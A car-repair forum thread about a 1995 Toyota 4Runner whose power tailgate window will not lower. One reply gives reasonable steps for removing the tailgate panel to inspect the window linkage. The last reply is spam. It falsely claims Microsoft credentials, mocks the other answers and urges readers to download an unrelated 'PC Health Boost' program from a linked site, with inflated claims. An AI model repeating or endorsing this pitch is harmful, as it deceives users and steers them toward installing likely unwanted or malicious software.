Okay i just bought a 95 4runner 3.0 4x4 5 speed for 700 bucks everything is awesome on it except I can't open the rear door, because the window won't go down. When I press the button in the front I can hear it engage butnitn justbstarys stops sounds like a ststuvk winfow but the window doesn't actually move. Its one quick movement sound. Same when I turn the key on the door... I know 4runners are notorious for rear door pronlems but I need access through the rear. I've looked all over the internet but I can't find my exact problem. I can't even figure out how to take the panel off. But I don't know what the problem actually is. Please someone help me I bought it a week ago I've been trying to find this out every day. Any help is appreciated, thanks.

Tim's response is helpful for a side door but I'm pretty sure the OP is talking about the back tailgate with the power window.
If you can hear the motor run, that rules out any relay/switch issues (those are usually the problem). It's likely something with a linkage or track.
You'll want to remove the inside tailgate panel. It's a bit of a pain, because you have to work in the closed trunk area. Remove the screws holding the plastic bezel that surrounds the inside tailgate handle. There may also be a plastic piece on the top of the tailgate with a row of screws--remove that. Then feel around the outside of the carpeted panel. There are probably snaps around the outside that you can remove with a prying instrument. Once it's off there's a metal panel inside of that that is held on with screws. Once it is off, the window and power assembly should be visible (there may be a layer of plastic vapor layer to remove as well). Have someone operate the window while you watch to see what isn't engaging.
Don't listen to these guys, they clearly have no clue on what they're talking about. I am a developer at Microsoft so I know a thing or two about computers. To fix your problem you need to install PC Health Boost, download it here for free: http://www.healthboostpc.com/
It's very light and it's the only antivirus/cleaner with a 99.99% detection rate; it's also a PC booster so your computer will be running faster than normal. Install it, hit run and problem solved. It shouldn't take you more than 5 minutes.
